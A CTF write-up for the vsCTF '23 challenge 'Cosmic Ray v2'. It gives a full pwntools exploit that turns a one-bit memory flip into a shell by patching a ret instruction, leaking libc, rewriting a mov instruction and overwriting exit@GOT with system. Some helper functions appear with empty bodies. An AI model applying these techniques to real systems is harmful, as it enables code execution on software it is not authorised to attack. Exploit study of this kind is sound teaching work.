[vsCTF '23] Cosmic Ray v2

An interesting twist on a past CTF challenge.

This challenge is a twist on the Cosmic Ray challenge from Sekai CTF '23. The original challenge was a simple buffer overflow, but this version removes the overflow opportunity.


We are provided a binary file, cosmicrayv2. Running some basic information on the file:

$ file cosmicrayv2
cosmicrayv2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=456d069a34fcc6d59e5df7c3e860655090962d4d, for GNU/Linux 3.2.0, not stripped

$ checksec cosmicrayv2
[*] '/home/joybuzzer/ctf/vsCTF-2023/pwn/cosmic-ray-v2/dist/cosmicrayv2'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)


I will use radare2 and Ghidra for the dissection of this challenge.

Checking main(), the most important information is a call to cosmic_ray(). Nothing is pushed into rdi before the function is called, I will venture into this function assuming no arguments are passed.

We'll use Ghidra for the disassembly of this function. We'll clean it up by naming each local variable, hiding the canary check, and removing some unnecessary casting. The result is shown below.

void cosmic_ray(void)
  int pos;
  long address;
  long bits;
  char byte;
  puts("Enter an address to send a cosmic ray through:");
  scanf("0x%lx", &address);

  int fd = open("/proc/self/mem", 2);
  lseek(fd, address, 0);
  read(fd, &byte, 1);
  bits = (long)byte_to_binary(byte);
  for (int i = 0; i < 8; ++i) {
    printf("%d|", (addrBin + i));

  puts("\n\nEnter the bit position to flip:");
  if (!(pos >= 0 && pos <= 7)) exit(1);

  int new_bits = flip_bit(bits, pos);
  char new_byte = (char)binary_to_byte(new_bits);
  printf("\nBit succesfully flipped! New value is %d\n\n",new_byte);

  lseek(fd, address, 0);
  write(fd, &new_byte, 1);

What does this function do for us? This function lets us input a memory address and then flip any bit at that specified address. With this, we hold a lot of power! We can change one bit at one address anywhere in the program's memory.


I started modifying random instructions after the flip to affect the program's flow. I recognized that cosmic_ray() comes right before main(), which was a big clue. If I could modify the ret instruction so that it no longer returned, the program would continue executing through main(), giving me another run of the binary.

What do I change ret to? As it is, ret is c3 in hex, which is 11000011 in binary. I must change the instruction such that it's still valid. Otherwise, the program will crash. Using a x64 Instruction Table, I found that modifying the second bit changed the instruction to 83, a cmp instruction. This won't crash the program and will still return to main().

Now that we can run the program infinitely, we can continue to modify single bits until we do something. We can clearly see we must get a shell.

Attack Vector

We know we must call system(). We don't know if ASLR is turned on, but we'll assume it is. This makes Step 1 to leak libc. From here, we can use the following code as the basis for our next steps:

│           0x00401543      8b45cc         mov eax, dword [var_34h]
│           0x00401546      85c0           test eax, eax
│       ┌─< 0x00401548      7808           js 0x401552
│       │   0x0040154a      8b45cc         mov eax, dword [var_34h]
│       │   0x0040154d      83f807         cmp eax, 7                  ; 7
│      ┌──< 0x00401550      7e0a           jle 0x40155c
│      │└─> 0x00401552      bf01000000     mov edi, 1
│      │    0x00401557      e844fcffff     call sym.imp.exit           ; void exit(int status)
│      └──> 0x0040155c      8b55cc         mov edx, dword [var_34h]

We dissected in our disassembly this was the following:

if (!(pos >= 0 && pos <= 7)) exit(1);
// continue

This tells us two things:

  • If we continue to enter valid bits, we will never call exit().

  • If we do put an invalid bit, we can call exit() on command.

This leads us to the GOT Overwrite exploit: we can overwrite the GOT entry for exit() with the address of system(). This will allow us to call system() with any argument we want.

To make this happen, we need to find a way to load /bin/sh into rdi. There already is an instruction to load 0x1 into edi before the call to exit(), so we must modify this instruction through consecutive bit-flipping.

How I found the Solution...

A bit of dumb luck managed to carry me through this. While I was stepping through the possibilities of changing the instruction through gdb, I noticed my input was sitting in rdx at the time of the mov edi, 1 instruction. This inspired me to change this instruction to mov edi, edx.


We can now put together our solution. Our solution comes in a few stages:

  1. Flip the return bit to allow infinite runs of the binary

  2. Leak libc using the program's output

  3. Modify the mov edi, 0x1 instruction

  4. Modify the GOT entry for exit() to point to system()

  5. Call system() after passing /bin/sh as our input.

I chose to write some helper functions to do this. The first function, bit_modify, takes an address and a bit and modifies that bit number.

def bit_modify(addr, bit):
    # send the address
    # modify the bit

The second function takes an address and reads the byte at that address. It does not modify the data there.

def read(addr):
    # send the address
    # get the byte
    x = bytes([int(b''.join(p.recvline().strip().split(b'|')).decode(),2)])
    # do and undo an action
    bit_modify(addr, 1)
    # return the leaked bit
    return x

The third function is string_modify, which takes an initial address and does a series of modifications. This is used to change instructions or series of addresses.

def string_modify(base, old, new):
    to_change = bytes(a ^ b for a, b in zip(old, new))
    to_change_bytes = [format(byte, '08b') for byte in to_change]

    for byte in range(len(to_change_bytes)):
        for bit in range(len(to_change_bytes[byte])):
            if to_change_bytes[byte][bit] == '1':
                bit_modify(base + byte, bit)

We can write the rest of our exploit now that we have these helper functions. Getting the addresses of most of the data here is trivial, so I'll leave it as an exercise to the reader.

  1. Flip the return bit to allow infinite runs of the binary

    print('Permitting infinite read/write...')
    bit_modify(0x4015e9, 2)
  2. Leak libc using the program's output. I leaked exit@got and then used the provided libc file to get the offset in libc.

    print('Leaking libc...')
    exit_got = bytearray()
    for i in range(8):
        exit_got += read(0x403fe8 + i)
    exit_got = u64(exit_got)
    print('\texit address:', hex(exit_got))
    libc.address = exit_got - libc.sym.exit
    print('\tlibc leaked:', hex(libc.address))
    system_got = libc.sym.system
    print('\tsystem address:', hex(system_got))
  3. Modify the mov edi, 0x1 instruction. This is the most difficult part of the exploit. We must find the address of the instruction and then modify it to mov edi, edx.

    print('Modifying MOV EDI, 0x1 instruction')
    string_modify(0x401552, b"\xbf\x01\x00\x00\x00", b"\x48\x89\xd7\x90\x90")
  4. Modify the GOT entry for exit() to point to system(). We can use the same string_modify function to do this.

    print('Modifying exit@GOT address')
    string_modify(0x403fe8, exit_got.to_bytes(8, 'little'), system_got.to_bytes(8, 'little'))
  5. Call system() after passing /bin/sh as our input. By passing data that's not a valid bit, it will call exit() (which is now system()). The address we chose to write was arbitrary, but it must be a valid address.

    print('Getting shell...')

If we run this, we get a shell and the flag!

Full Exploit

from pwn import *

elf = context.binary = ELF('./dist/cosmicrayv2')
libc = elf.libc
p = remote('vsc.tf', 3047)

def bit_modify(addr, bit):
    # send the address
    # modify the bit

def read(addr):
    # send the address
    # get the byte
    x = bytes([int(b''.join(p.recvline().strip().split(b'|')).decode(),2)])
    # do and undo an action
    bit_modify(addr, 1)
    # return the leaked bit
    return x

def string_modify(base, old, new):
    to_change = bytes(a ^ b for a, b in zip(old, new))
    to_change_bytes = [format(byte, '08b') for byte in to_change]

    for byte in range(len(to_change_bytes)):
        for bit in range(len(to_change_bytes[byte])):
            if to_change_bytes[byte][bit] == '1':
                bit_modify(base + byte, bit)

print('Permitting infinite read/write...')
bit_modify(0x4015e9, 2)

print('Leaking libc...')
exit_got = bytearray()
for i in range(8):
    exit_got += read(0x403fe8 + i)
exit_got = u64(exit_got)
print('\texit address:', hex(exit_got))

libc.address = exit_got - libc.sym.exit
print('\tlibc leaked:', hex(libc.address))
system_got = libc.sym.system
print('\tsystem address:', hex(system_got))

print('Modifying MOV EDI, 0x1 instruction')
string_modify(0x401552, b"\xbf\x01\x00\x00\x00", b"\x48\x89\xd7\x90\x90")
print('Modifying exit@GOT address')
string_modify(0x403fe8, exit_got.to_bytes(8, 'little'), system_got.to_bytes(8, 'little'))

print('Getting shell...')


Last updated

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